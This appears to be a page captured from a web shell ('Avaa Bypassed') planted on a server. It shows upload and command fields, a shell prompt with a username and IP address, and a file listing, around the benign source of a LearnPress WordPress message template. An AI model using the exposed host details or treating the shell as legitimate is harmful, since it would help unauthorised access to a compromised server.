[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.145.58.157: ~ $
<?php
/**
 * Template for displaying global message.
 *
 * This template can be overridden by copying it to yourtheme/learnpress/global/message.php.
 *
 * @author  ThimPress
 * @package  Learnpress/Templates
 * @version  3.0.0
 */

/**
 * Prevent loading this file directly
 */
defined( 'ABSPATH' ) || exit();
?>

<?php if ( ! $messages ) {
	return;
} ?>

<?php foreach ( $messages as $type => $message ) { ?>

	<?php if ( $message ) { ?>

		<?php foreach ( $message as $content ) { ?>

			<?php $options = array();
			if ( is_array( $content ) ) {
				$options = $content['options'];
				$content = $content['content'];
				$options = wp_parse_args(
					$options,
					array(
						'position'  => '',
						'delay-in'  => 0,
						'delay-out' => 0
					)
				);
			}
            $type = 'message-' . $type;
			$classes = array( 'message ', esc_attr( $type ) );
			$data    = array();
			if ( ! empty( $options['position'] ) ) {
				$classes[] = $options['position'];
				if ( ! empty( $options['delay-in'] ) ) {
					$data[] = sprintf( 'data-delay-in="%s"', $options['delay-in'] );
				}

				if ( ! empty( $options['delay-in'] ) ) {
					$data[] = sprintf( 'data-delay-out="%s"', $options['delay-out'] );
				}
			}
			?>
            <div class="<?php echo join( ' ', $classes ); ?>" <?php echo $data ? join( ' ', $data ) : ''; ?>>
                <i class="fa"></i><?php echo $content; ?>
            </div>

		<?php } ?>

	<?php } ?>

<?php } ?>

Filemanager

Name Type Size Permission Actions
become-teacher-form Folder 0755
become-teacher-form.php File 1.33 KB 0644
before-main-content.php File 1.36 KB 0644
breadcrumb.php File 817 B 0644
message.php File 1.42 KB 0644